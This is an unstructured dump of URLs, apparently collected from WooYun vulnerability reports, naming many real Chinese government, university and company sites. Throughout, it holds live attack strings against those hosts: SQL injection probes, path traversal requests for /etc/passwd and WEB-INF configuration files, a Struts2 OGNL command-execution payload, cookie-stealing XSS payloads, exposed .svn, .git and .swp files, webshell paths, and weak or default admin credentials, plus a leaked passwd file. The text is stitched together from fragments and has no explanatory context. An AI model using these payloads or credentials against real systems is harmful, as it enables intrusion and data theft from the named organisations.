http://account2.gongfubb.com/home/user_service_utf8.php?do=get_userinfo http://tyb.just.edu.cn/ http://tyb.just.edu.cn/nzcms_nzweb/nzcms_up/data/beifeng/asp.asp http://www.jxzbtb.gov.cn/jxcms/front/search/go.action http://**.**.**/zport/dmd/qs-step1submitted= www.aisida.cn http://www.km-17.com/product/cplist.php?zmlei=15 http://www.gw-17.com/product/cplist.php?keyword=PH%BC%C6 http://www.yksanxing.com/cplist.php?sid=74 http://www.dbxinlong.com/cplist.php?SortID=6 http://www.txj-instrument.com/case/cplist.php?id=56 http://www.ykyyqh.com/qh/cplist.php?sid=13 http://www.dsqzjmz.com/cplist.php?sid=23 http://www.nhtequipment.com/cn/cplist.php?sid=19 http://www.mx-17.com/product/cplist.php?zmlei=16&smlei=336&omlei=394 http://www.yyzic.cn/product/cplist.php?zmlei=15&smlei=173&omlei=1380 http://www.cy-17.com/product/cplist.php?zmlei=15&smlei=166 http://www.gk-17.com/product/cplist.php?zmlei=22 http://www.tchld17.com/product/cplist.php?zmlei=16&smlei=333 http://jinfen-17.com/product/cplist.php?zmlei=23 
http://www.17-17.cn/product/cplist.php?zmlei=15&smlei=169&omlei=272 http://www.xlhuangniu.com/cplist.php?SortID=19 http://www.jre-17.com/product/cplist.php?keyword=%D5%F1%B5%B4%C6%F7 http://www.shenhuagroup.com.cn/cs/Satellite?c=sh_news_p&cid=1382685035004&pagename=shenhua%2Fsh_news_p%2Fsh_layout%2FgoShenhua%2FpictureLayout&ccid=1385712590227 http://117.135.151.12:7007/ http://xinghuo.yixin.com/index.shtml http://drops.wooyun.org/papers/4611 http://bbs.oppo.cn/ http://bbs.oppo.cn/misc.php?mod=imgcropper http://www.xplus.com/quanpingchuban_anlidaquan.html http://v.jxsb.cn/ http://my.xcar.com.cn/set/task_novice.php http://mlife.cmbchina.com/PlutoPushProxy/queryMessageFromClient.json?_ver=4.2.0&_requuid=EC92A073-39E9-0467-4C2D-59479A237C88&_pla=cmblife_iphone_4.2.0_&_pro=0&_appId=202cb962ac59075b964b07152d234b70&_r=YES&_iv=24&_accountId=1233e1af18894e0b3e0a79c37771b5ee&_uid=202cb962ac59075b964b07152d234b70&DeviceID=202cb962ac59075b964b07152d234b70&appId=202cb962ac59075b964b07152d234b70&_ss=888*888&_mt=iphone100 http://www.smartcome.com/forum.php?mod=viewthread&tid=1%20union%20select%201%20from/*123*/dual--%201 http://fudanwang.com/user/repassword?email=14xxxx2@qq.com&username=wooyuners http://fudanwang.com/user/repassword?email=5xxxxxx3@qq.com&username=admin http://fudanwang.com/user/repassword?email=14xxxx2@qq.com&username=wooyuners http://lenovobbs.lenovo.com.cn/.svn/entries http://redmine.camera360.com/config/database.yml http://www.scal.com.cn/invite2011/admin/ http://www.scppa.gov.cn/search/index.jsp?keyword=2014&clom=doctitle http://www.hisome.com/hisome/Product/Product.html http://202.110.209.186/html/login.html http://218.201.243.175:90/html/login.html http://218.26.1.11/html/login.html http://101.71.242.134/html/login.html http://101.71.242.67/html/login.html www.fruitday.com http://plus.demo.lebi.cn http://api.open.baidu.com/pae/common/page/marriage 
https://github.com/xiaowaizhuanshu/rchlw/blob/4214206b190684d1497ecc0741a805432b03b10f/src/main/java/com/ruyicai/util/UtilEmail.java http://www.ywetone.com/ http://ehome.ywetone.com/LoginLingjl.aspx http://222.26.127.247/admin/test.php http://222.26.127.247/news/readnews.php?id=685 http://nc.hbny.com.cn:9090/hrss/pub/UploadAttach.jsp?appName=PSNBASDOC_RM&pkAttach=0001V11000000001NLAX http://www.xtst.gov.cn/ImgList.aspx?m=20130711133536357933 http://bbs.meishi.qq.com/ site:zt.ftuan.com url:http://zt.ftuan.com/install/AccountWebService.asmx?op=AddAccount zt.ftuan.com/Plugins/2.aspx http://localhost/KPPW/index.php?do=user&view=message&op=send http://localhost/KPPW/index.php?do=pubtask&id=1&step=step2 http://localhost/KPPW/admin/index.php?do=user&view=list&op=del&edituid=5529 http://localhost/KPPW/admin/index.php?do=user&view=add&edituid= http://bbs.kdxy.wanmei.com:80/config/.config_ucenter.php.swp http://bbs.rwpd.wanmei.com:80/config/.config_ucenter.php.swp http://bbs.kdxy.wanmei.com:80/config/.config_ucenter.php.swp http://a.xcar.com.cn http://a.xcar.com.cn/bbs/usercenter.php?zoneclick=101232这个链接点击刷新并且抓包 http://etrust.ecitic.com/citictrust/userLogin.do http://www.travel.citic.com/route_detail.jsp?routeid=201401231552 http://www.fsit.net/ http://www.fskwjzyy.com/mainnews/WebEditor/db/ewebeditor.mdb http://fsgqt.org.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsmzxx.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnfsjb.gov.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.xltk.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsyczx.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsfly.org/mainnews/WebEditor/db/ewebeditor.mdb http://www.fssszylglzx.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnshjk.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsxgz.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.yeyany.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsjshy.com/mainnews/WebEditor/db/ewebeditor.mdb 
http://www.baodianfaye.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.yanyanyy.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.lnyuanda.com/mainnews/WebEditor/db/ewebeditor.mdb http://www.fsxf.gov.cn/mainnews/WebEditor/db/ewebeditor.mdb http://www.xxxxx.com/mainnews/WebEditor/admin_login.asp这里登录 http://coating.hc360.com http://coating.hc360.com http://bbs.arcgames.cn/config/.config_ucenter.php.swp http://bbs.arcgames.cn/config/.config_global.php.swp http://gps.sztb.gov.cn http://61.144.253.234:61081 http://work.ylshenhua.com/login.asp COde:data http://bbs.chexun.com/shop_info.php?info=55 http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D'+and+'1'='1 http://interface2.i.178.com/~subscribe.index.index/type/1/uid/18422277/ch/D'+and+'1'='2 http://item.tourzj.gov.cn/Leader/eHome/login.aspx http://item.tourzj.gov.cn/ygzw/GG.aspx?id=1356 http://post.blog.hexun.com/login.aspx,发现这个界面是没有验证码的(前台没有后台肯定也没有额) http://www.96877.sh.cn/ http://jjpt.ylshenhua.com/news.asp?ID=183 http://jjpt.ylshenhua.com/Data/ http://wooyun.org/bugs/wooyun-2010-091946 http://pay.100bt.com/login.action https://tender.wanda.cn/file!download.en?id=7663506 http://www.sdwr.gov.cn/sdsl/loginJjxx.jsp http://my.fangdd.com/member/order/detail?orderId=922 http://my.fangdd.com/member/order/detail?orderId=911 http://shop.kouclo.com/trade/order_detail/2015011920000013327 https://ebank.spdb.com.cn/per/main http://202.108.13.148/ encap:Ethernet F3:FC:E6:67:DC addr:192.168.8.17 Bcast:192.168.8.255 Mask:255.255.255.0 fcff:fee6:67dc/64 Scope:Link MTU:1500 packets:7037072758 packets:6895316171 txqueuelen:1000 http://sys.zafu.edu.cn/dy/model/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=http://sys.zafu.edu.cn/dy/model/fckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://bbs.chexun.com/shop_list.php?mod=cat&catid=32 
https://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=%22%3B%7D%3Balert%281%29%2F%2Fxss%E4%BB%A3++%22%3B%7D%3Balert%281%29%2F%2F%22%3B%7D%3Balert%281%29%2F%2F%22%3B%2F%2F%2F%2F&sa=tb&ts=2183715&t_kt=38 http://www.sanyuki.com/仙芝官网 http://www.pgywxy.com/ http://60.12.117.118/compinfoaction!tozcCompinfo.action?codeno=59b62944-8e0a-4fe0-9ddd-20d4e63e2526、 http://**.**.**/ http://mzxy.hebtu.edu.cn/phpcms/upload.php http://202.127.48.146/login.jsp http://www.hzrc.com/cy/SignViewAttach2014.aspx?id= http://121.196.43.143/ http://master1.zabbix.shopex.cn https://zyzfcg.ggj.gov.cn/.svn/entries https://zyzfcg.ggj.gov.cn/.svn/text-base/.htaccess.svn-base http://www.gz.10086.cn/service/attach?action=download&file_path=/WEB-INF/web.xml&file_name=web.xml&mode=open http://218.78.217.76/ http://www.gdsto.com.cn/ http://www.gdsto.com.cn/NewsShow.asp?id=89 http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://106.38.248.115:8080/ http://111.206.111.189/xampp/ http://www.gzgczj.com/Manage_System/Default.aspx http://www.whschgm.com http://venus.suning.com/manage/syslogin.aspx?result=4 http://zhuanti.ahedu.gov.cn/fwytj/show.asp?id=10 http://www.mscbsc.com/askpro/question.php?qid=69339 http://www.mscbsc.com/askpro/question.php?qid=69339 http://125.46.74.42:7001/rtp/login!loginUI.action?code=20 http://**.**.**/khyy/login.asp http://sh.12321.cn/x_y.asp?id_nes=4508 http://www.sdxjpc.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm www.itpub.net/data.zip http://www.8ycn.com/ http://www.bzxmqc.com/news_detail.php?keyno=37 http://bys.bzrc.cn/news_detail.php?keyno=840 http://www.yuxigroup.com/news_detail.php?keyno=56 http://www.bdsl.cn/news_detail.php?keyno=45 http://www.kfqshxx.com/news_detail.php?keyno=123 http://huoguoyu.com/news_detail.php?keyno=17 http://www.zonyo.net/news_detail.php?keyno=135 http://www.tianjianchina.com/news_detail.php?keyno=16 http://www.bzhxdl.com/news_detail.php?keyno=27 
http://www.juxinlicai.com/news_detail.php?keyno=250 http://www.sdhuayugt.com/news_detail.php?keyno=10 http://www.xiangchi.com/liangyou/news_detail.php?keyno=25 http://www.zhcszy.cn/news_detail.php?keyno=91 http://www.sdcfcg.com/news_detail.php?keyno=64 http://mangkabz.com.cn/news_detail.php?keyno=548 http://www.sdjnhx.com/news_detail.php?keyno=11 http://www.bzsanli.com/news_detail.php?keyno=6 http://www.qiangtusw.com/news_detail.php?keyno=3 http://www.zpsjjj.com/news_detail.php?keyno=12 http://www.hmbaila.com/news_detail.php?keyno=17 http://www.binzhouanhui.com/news_detail.php?keyno=17 http://www.tzysclp.com/news_detail.php?keyno=16 http://www.bzkfqsyy.com/news_detail.php?keyno=2278 http://www.topys.cn/article/detail?id=16257 http://www.topys.cn/api/member/detail?&_r=0.2300950309582218这个方法就可以查看到该人的详细信息 http://www.bdnmg.com:8080/gps/login http://www.2081234.cn http://www.lynu.cn/xinwen/tongzhi.php?typeid=5 http://www.lynu.cn/xinwen/whatsnew.php?typeid=4 http://www.lynu.cn/xinwen/whatsnew1.php?typeid=4 http://yida.taoche.com/left.aspx http://scm.tmt.tcl.com/ http://116.228.171.38/,admin密码123456,登录后访问http://116.228.171.38/admin/,可对系统进行操作,证明: http://123.125.120.224 WWW.ChinaCache.com/template.rar http://zhengwen.dxzq.net/ http://zhengwen.dxzq.net/article?id=918 http://www.747.cn/.git/config http://www.747.cn/index.php?a=orderDetails&m=Memberpc&orderid=jd_4068726190 http://www.747.cn/admin.php http://www.decai.wang/123.rar http://www.scrc365.com/wwwroot.rar www.scrc365.com http://www.xuzhou114.net/wwwroot.rar http://www.hcrcw.net/hcrcw.rar mail.eco.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 mail.nxca.gov.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 
mail.polus.edu.cn/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 kali:/share/exploit/cms/zimbra# https://eco.gov.cn:7071/zimbraAdmin/ http://wordpress.7po.com/ http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp?filename=download.jsp http://xmgl.cstc.gov.cn/kwxmgl/jsp/nosession/download.jsp http://www.jlsi.gov.cn/wwwroot/jlsi/main.jspx http://www.jlsi.gov.cn:8080/otp/login.jsp?message=&loginAccount= http://gc.cscec8b.com.cn/ http://www.hnahotelsandresorts.com http://www.hnahotelsandresorts.com/ajax/AjaxHandler.ashx http://www.cmscforum.com/activity/admin/login存在弱口令 http://**.**.**/scetb2b/b2b/orderquery/pnrdisplay.jsppnrno= http://**.**.**/scetb2b/b2b/orderquery/pnrdisplay.jsppnrno=NGSR2B http://elearning.100e.com/lvword/AddToMyLib.asp?LetterLevel=0&PageNo=6&WordLevel= http://elearning.100e.com/ http://218.83.241.245/shell.asp http://www.wayboo.cn/ xxxx.com/control/login.php http://www.xayichi.com/subweb_list.php?class=37 http://www.xakqby.com/subweb_list.php?class=37 http://www.sjzbangongjiaju.com/subweb_list.php?class=37 http://www.pbdt360.com/subweb_list.php?class=37 http://www.zzpjjg.com/subweb_list.php?class=44 http://www.jndsmm.com/subweb_list.php?class=37 http://www.xyxf119.com/subweb_list.php?class=37 http://qcsiwang.com/subweb_list.php?class=37 http://hrgg88.com/subweb_list.php?class=63 http://tianchuanfood.com/subweb_list.php?class=37 http://chengkai888.com/subweb_list.php?class=37 http://www.lhzpl.com/subweb_list.php?class=37 http://www.hbdxps.com/subweb_list.php?class=37 http://www.hszs555.com/subweb_list.php?class=37 http://www.chengtiannuanqi.com/subweb_list.php?class=37 http://chengxinbaipisong.com/subweb_list.php?class=37 http://www.caciquemill.net/subweb_list.php?class=37 http://www.qiuzhenwushi.com/subweb_list.php?class=73 http://www.huashidaijiaoyu.com/subweb_list.php?class=37 http://bdjunlong.com/subweb_list.php?class=37 
http://www.bszyjc.net/subweb_list.php?class=37 http://www.bszyjc.net/subweb_list.php?class=37 http://bdjunlong.com/subweb_list.php?class=37 http://plus.demo.lebi.cn/——可注册普通用户和商家用户 http://demo.lebi.cn/——可注册普通用户 http://plus.demo.lebi.cn/进行测试 http://plus.demo.lebi.cn/supplier/即可登陆商家页面 http://shop.lutoog.com/ http://www.wanxinsoft.com/ http://222.204.208.4/site/model/twogradepage/playtv.aspx?id=1396 http://59.69.101.10/model/TwoGradePage/playtv.aspx?id=1396 http://121.192.178.138/model/TwoGradePage/playtv.aspx?id=1396 http://202.206.48.106/model/TwoGradePage/playtv.aspx?id=1396 http://dxsb.qfnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://peclub.ecnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://engtc.sjtu.edu.cn///model/TwoGradePage/playtv.aspx?id=1396 http://dxsb.qfnu.edu.cn//model/TwoGradePage/playtv.aspx?id=1396 http://engtc.sjtu.edu.cn///model/TwoGradePage/playtv.aspx?id=1396 http://jd.517na.com) http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2014-12-21&txtEndDate=2015-01-21&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0&txtBuyerStatffId= http://fw.rrs.com http://fw.rrs.com/snaplb/anonymous/topic/portal/b44176ee-001e-41f0-9af9-3af8bd7fe1a2?topicTypeId= http://222.204.208.4/Site/model/TwoGradePage/down.aspx?columnId=76&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://59.69.101.10/model/TwoGradePage/down.aspx?columnId=98&pid=64&clname=%E4%B8%8B%E8%BD%BD%E4%B8%AD%E5%BF%83 http://121.192.178.138/model/TwoGradePage/down.aspx?columnId=120&pid=98&clname=%E4%B8%8B%E8%BD%BD%E4%B8%AD%E5%BF%83 http://peclub.ecnu.edu.cn/model/TwoGradePage/down.aspx?columnId=76&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://labch.cumt.edu.cn:81/model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://engtc.sjtu.edu.cn/model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD 
http://dxsb.qfnu.edu.cn//model/TwoGradePage/down.aspx?columnId=60&pid=42&clname=%E5%AE%9E%E9%AA%8C%E5%A4%A7%E7%BA%B2%E4%B8%8B%E8%BD%BD http://www.crmhc.com/index.jsp http://www.crmhc.com/department/department.jsp?department_id=2 http://www.vans-china.cn/report/zrkcsplbcxlb.jsp http://zwzx.xmmsa.gov.cn:83/#A01 http://zwzx.xmmsa.gov.cn:83/NoticesDetail.aspx?nId=1196 https://vpn.sohu-inc.com/+CSCOE+/logon.html http://drops.wooyun.org/papers/3451 http://218.58.70.134/ http://210.77.84.46:81/ http://180.168.192.42:8080/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://i.zhaopin.com/Login/LoginManager/Login http://cm.qcloud.com http://cm.qcloud.com/detail2/embed.php?type=cdb&val=************ http://e.fangdd.com/ http://mpcms.youku.com/ http://cloud.qq.com http://www.qcloud.com http://cm.qcloud.com http://sms.china-sss.com/newAnonymousComplaint.json# http://218.58.70.201/haier/sys/Login_dologin.action http://www.shejiben.com/mobileapp/my/info.php?uid=1300817 http://www.shejiben.com//mobileapp/my/index.php?uid=1 http://202.102.221.14:8011/portal/电信后台 http://202.102.221.14:8011/portal/changePassword.jsp?empeeAcct= http://202.102.221.14:8011/OdmWeb/queryOrder/YdqPrintCg?orderIds=104272434&latnId=550&type=1&flag=1&custOrderId=59272919 http://sms.china-sss.com/downloadFile.json?tuId=110333&random=0.001489174086600542 http://sms.china-sss.com/downloadFile.json?tuId=110331&random=0.001489174086600542 http://www.cmscforum.com/cmsgift/admin/login POST:http://cm.qcloud.com/catv2/request.ajax.php cmd:simpleVerifyTask 
http://manage.qcloud.com/ g_tk:1298727730 http://cm.qcloud.com/catv2/request.ajax.php http://180.153.27.5/ http://mail.shmetro.com http://sdgs.shenhuagroup.com.cn http://219.222.191.152:8080/recruit/servlet/newsManage?id=33 http://113.140.66.226:8080/12369/login.do http://wooyun.org http://wooyun.org http://wooyun.org/ http://wooyun.org http://wooyun.org http://wooyun.org/ http://zybj.jnu.edu.cn/user/reg.asp http://zybj.jnu.edu.cn/admin/login.asp http://zybj.jnu.edu.cn/upfiles/20150121/20150121163113081308.asp http://124.17.5.226/index.do https://portal.haier.com/haierCms/zxzx/gllc/index.shtml http://119.254.67.196/ http://image.post.tom.com/style/commom%5Cxing.php http://www.comingchina.com/html/downloads/ http://www.comingchina.com/html/case/ http://pan.baidu.com/s/1nQRzo https://github.com/nathanyhm/langlearning/blob/83dc5290c242a37ec609234b7caecd028a448ec7/pythonlearning/ipmonitor_aio.py http://b.taoshij.com/ http://www.qq.com/coral/coralindex/indexCoral_new.htm http://ent.qq.com/a/20150121/005159.htm http://web1.sjvpn.net:7000/webadmin/useradmin/user_self_new.php http://sys.linghangyun.com/sysadmin/useradmin/user_self_new.php http://bbs.168tuiguang.com:8000/vpnadmin/useradmin/user_self_new.php http://user.huanqiuip.com/user_self_new.php http://ffuser.syssuper.com/user_self_new.php http://seouser.syssuper.com/user_self_new.php http://sys.green520.com:8000/vpnadmin/useradmin/user_self_new.php http://vip.18ht.net:8000/webadmin/useradmin/user_self_new.php http://jj.syssuper.com/useradmin/user_self_new.php http://lmuser.syssuper.com/user_self_new.php http://sys.168hdkfc.com:8000/vpnadmin/useradmin/user_self_new.php http://miyunuser.syssuper.com/user_self_new.php http://client.168hdkfc.com:8000/vpnadmin/useradmin/user_self_new.php http://wooyun.org/bugs/wooyun-2010-078082 http://wooyun.org/bugs/wooyun-2010-074371 http://kfdc.cdpf.org.cn/ filetype:xlsx http://cgy.name:90/vaio_bak/rsun/resources/弘阳网站管理参数.xlsx http://www.redsun.com.cn/manager/ https://61.144.235.34/ 
http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp?mkbh=M005001 http://www.ybxfj.gov.cn/Y01/ws_xw/index.asp?mkbh=M005001 http://sqlmap.org http://intl.wisco.com.cn http://intl.wisco.com.cn/cms/app存在目录遍历漏洞,可查看app目录所有文件咯···· http://intl.wisco.com.cn/cms/app/permission/userPreivileges-old.jsp https://github.com/PTS-CD/3six5/blob/abcd052570d0d143c52f5606ebf28afdacb89631/src/main/resources/net/tangs/three6five/system.properties http://60.191.42.42/sinoiabd/checklogin/pubUserPosts.do http://www.jit.com.cn/ http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070703&department_name=乡镇(街道)政府&department_Type=0&isFirstShow= http://218.62.90.168/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070703&department_name=乡镇(街道)政府&department_Type=0&isFirstShow= http://61.138.128.150:8080/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221290453&department_name=政府直属事业单位&department_Type=0&isFirstShow= http://222.34.78.21/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031138500843&department_name=白城市人民政府&department_Type=0&isFirstShow=是 http://218.62.67.213/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://222.160.175.90/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200809231048070671&department_name=政府部门和具有管理公共事务职能的组织&department_Type=0&isFirstShow= http://www.ilj.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://222.162.179.83/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221280718&department_name=政府工作部门&department_Type=0&isFirstShow= http://xxgk.yanji.gov.cn/zwdtSjgl/Directory/depLayerListDir.jsp?department_id=DE200804031221290453&department_name=各乡镇、街道&department_Type=0&isFirstShow= http://www.hzda.gov.cn/web/WebDisk/FileList.aspx?id=123 http://www.studyez.com/leaveword/default.aspx 
http://www.studyez.com:80/leaveWord/Default.aspx www.studyez.com http://223.82.244.92/eshow/ http://www.lagtj.gov.cn/ http://www.lagtj.gov.cn/%c0%ae/WEB-INF/web.xml http://www.lagtj.gov.cn/%c0%ae//WEB-INF/config/application-context.xml http://www.lagtj.gov.cn/%c0%ae//WEB-INF/config/jdbc.properties http://webscan.360.cn/ http://help.53kf.com/ http://www.ejiayu.com/web_adm/admin_index.php。 http://custom.ccb-life.com.cn:9080/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://icc.21cp.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://111.75.198.122/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://im.e-picc.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://icc.occard.com.cn/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634%27%20and%201=1--+&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://officemsg.focus.cn/group/photo_search.php?group_id=81634&search_str=sohu&search_type=author&search_area=81634%27%20and%201=0--+&submit=%CB%D1%CB%F7%CD%BC%C6%AC http://creditcard.bankcomm.com/web/common/getfile.jsp?p=..\\..\\..\\..\\etc\\passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false haldaemon:/var/run/hald:/bin/false daemon:/var/lib/sshd:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash uucp:x:10:14:Unix-to-Unix 
system:/etc/uucp:/bin/bash uuidd:x:102:104:User uuidd:/var/run/uuidd:/bin/false puppet:x:103:105:Puppet daemon:/var/lib/puppet:/bin/false at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false ntp:x:74:107:NTP daemon:/var/lib/ntp:/bin/false pulse:x:105:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false suse-ncc:x:106:110:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash gdm:x:107:111:Gnome daemon:/var/lib/gdm:/bin/false transadmin:x:9013:9013::/home/transadmin:/bin/bash login01:x:9001:9001::/home/login01:/bin/bash patrol:x:9009:9009::/home/patrol:/bin/bash splunk:x:9011:9011::/home/splunk:/bin/bash pccc:x:6011:6011::/home/pccc:/bin/bash uficc:x:9014:6001::/opt/uficc:/bin/bash http://www.zjsc.gov.cn/lingshou/servlet/MainServer file:///etc/passwd&Work=getnewsinfo http://love.17173.com/ http://118.112.181.187/wznj/, http://118.112.181.187/console/,用户名和密码都是weblogic,可部署war木马,发现漏洞后,没进一步测试。证明: http://www.ccqtgb.com/download/download.jsp?filename=windows/win.ini&filepath=../../../../../../../../../../../windows/win.ini http://2.taobao.com/ http://www.suopingbao.com/api.php?_ksTS=1421338903592_548&&callback=jsonp459&c=checkcode&mobile=手机号码&sessionid=验证码ID&identity=app.taobao.com&code=验证码&sms_type=1&name=APP名称(自定义短信内容)&id=APP的ID http://try.cosmetics.ifeng.com http://180.*****.214/Alarm/Admin http://www.yjkang.cn/home_home.action http://www.yjkang.cn/home_downMmanual.action?manualFileName=../../WEB-INF/web.xml http://zyyd.media.open.com.cn/picexam/wszypic.asp?a_id=000203&c_depth=1&c_id=bl&p_type=%D5%EF%B6%CF%27 http://211.147.239.62/ https://m.baidu.com/from=2001a/pu=sz%401320_480/s?word=%22%2Balert%28document.cookie%29%2B%22%22%2Balert%28document.cookie%29%2B%22&sa=tb&ts=7803325&t_kt=76 
http://m.baidu.com/from=2001a/bd_page_type=1/ssid=0/uid=0/pu=sz%401320_480%2Cta%40iphone___3_537%2Cusm%401/baiduid=CE5B17AA9267A14825338E1C480E4430/w=0_10_%22%2Balert%28document.cookie%29%2B%22%22%2Balert%28document.cookie%29%2B%22/t=iphone/l=1/tc?ref=www_iphone&lid=10763659046364824509&order=8&fm=alfy&tj=Wp_8_0_10_title&sec=757&di=981cd263dbcbaf4f&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IIBOPPCUK1De8mVjte4viZQRAJ7GgNXXTUS4jvCPQpwoDwmGdXTVqj2A4u_-ghzRwniCwubjms1bVVct1ag2hLgDkDXBql0qgyKlMxAgoBxIoB7EvpOX6ew9kfdmDxgx7lBaYg8imqc7QYo3 http://moldsale.haier.com/ http://moldsale.haier.com/bidadmin/bidedit.asp?id=1000 http://120.132.37.228:8000/ http://www.udemy.com/blog) http://moffice.wo.com.cn//download.php?MenuID=2 http://120.132.57.124:8000/Public/login http://mail.dqghj.gov.cn/ http://weixin.lenovo.com.cn/weixin/index.php/shop/pay_create?openid=oLHCTjocHWBkc34TdXZEK0O8qPgg&proid=19159&flashsaleproductid=318&shopid=495 http://**.**.**/ http://**.**.**/ http://**.**.**/ http://211.147.239.62/ http://**.**.**/ http://**.**.**/ http://sdcdc.nlsense.com:8000/main.aspx http://mhjbyf.nlsense.com:6800/main.aspx www.hbxtgt.gov.cn http://jd.517na.com) http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2014-12-21&txtEndDate=2015-01-22&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0&txtBuyerStatffId= http://www.gxeport.gov.cn:8080/pdms_qz/bayonetmanage/frm_makecard.aspx?pageindex=2 http://www.yixinfund.com/daogou/jjxq.php?code=470028%27 http://www.yixinfund.com/daogou/zdjj.php http://jjfz.ahu.edu.cn/manage/M_EditNoticeNews.aspx?id=51 http://211.147.239.62/ http://mp3.sogou.com/tiny/singer?singer_id=6028&singer_name=A-Lin http://mp3.sogou.com/tiny/singer?singer_id=6028&singer_name=A-Lin%3Cimg%20src=%22%22%3E%3C/img%3E http://www.vpclub.cn/about/index/id/1 http://www.cd315.gov.cn/zxgg.asp?typeid=4&bigclassid=18&smallclassid=50 http://www.cd315.gov.cn/admin/login.asp http://www.cd315.gov.cn/admin/uploadface.asp http://www.cd315.gov.cn/admin/Media.asp 
